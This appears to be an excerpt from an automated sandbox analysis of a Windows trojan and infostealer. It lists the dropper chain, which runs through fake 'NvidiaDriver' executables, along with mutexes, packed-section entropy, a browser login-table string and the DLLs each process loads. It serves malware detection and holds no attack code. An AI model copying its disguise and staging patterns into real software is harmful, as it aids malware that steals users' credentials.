                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00AF8E10 appears 47 times
                        Source: 184f72cd859c47b29124ab7c76766326.exe.10.drStatic PE information: Number of sections : 18 > 10
                        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: 0tClIDb[1].exe.6.drStatic PE information: Section: ZLIB complexity 0.9979009119217082
                        Source: 0tClIDb[1].exe.6.drStatic PE information: Section: tgrwqosf ZLIB complexity 0.9944222813238771
                        Source: 0tClIDb.exe.6.drStatic PE information: Section: ZLIB complexity 0.9979009119217082
                        Source: 0tClIDb.exe.6.drStatic PE information: Section: tgrwqosf ZLIB complexity 0.9944222813238771
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@18/49@4/5
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\0tClIDb[1].exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3156:120:WilError_03
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: 0tClIDb.exe, 00000007.00000003.2492069042.00000000058C7000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2492591347.0000000005895000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: 0tClIDb.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                        Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                        Source: file.exeString found in binary or memory: GRtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeW
                        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exe "C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeProcess created: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exe "C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exe"
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeProcess created: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe "C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe"
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess created: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exe "C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exe" --vision
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe "C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe" --vision
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess created: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exe "C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exe"
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe "C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe" --vision
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exe "C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeProcess created: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exe "C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeProcess created: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe "C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess created: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exe "C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exe" --vision
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess created: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exe "C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exe"
                        Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeSection loaded: linkinfo.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeSection loaded: ntshrui.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeSection loaded: cscapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: linkinfo.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: ntshrui.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: cscapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: secur32.dllJump to behavior
